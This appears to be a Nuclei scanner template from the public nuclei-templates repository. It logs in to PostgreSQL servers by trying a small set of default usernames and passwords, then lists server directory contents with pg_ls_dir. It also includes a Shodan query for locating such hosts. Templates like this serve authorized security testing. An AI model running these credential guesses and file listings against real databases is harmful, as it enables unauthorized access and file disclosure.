Files
nuclei-templates/javascript/enumeration/pgsql/pgsql-file-read.yaml
2024-12-01 13:30:43 +00:00

50 lines
1.3 KiB
YAML

id: pgsql-file-read
info:
name: PostgreSQL File Read
author: pussycat0x
severity: high
description: |
Read and list the files within the PostgreSQL database,
reference:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
metadata:
verified: true
max-request: 8
shodan-query: "product:\"PostgreSQL\""
tags: js,network,postgresql,authenticated,enum
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const postgres = require('nuclei/postgres');
const client = new postgres.PGClient;
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
Export(connected);
args:
Host: "{{Host}}"
Port: 5432
User: "{{usernames}}"
Pass: "{{password}}"
Db: "{{database}}"
payloads:
usernames:
- postgres
- admin
password:
- postgres
-
- 123
- amber
database:
- postgres
attack: clusterbomb
extractors:
- type: json
json:
- '.Rows[].pg_ls_dir'
# digest: 4b0a00483046022100dc1e8455e0b162cb8366c42b7cab0ee1111fa99951dbd6c72d6b6fb5d8d314a3022100b9105682575b794a19077b0722fd0e320d15532f6a10fbd9e6c1ee81062d20e5:922c64590222798bb761d5b6d8e72950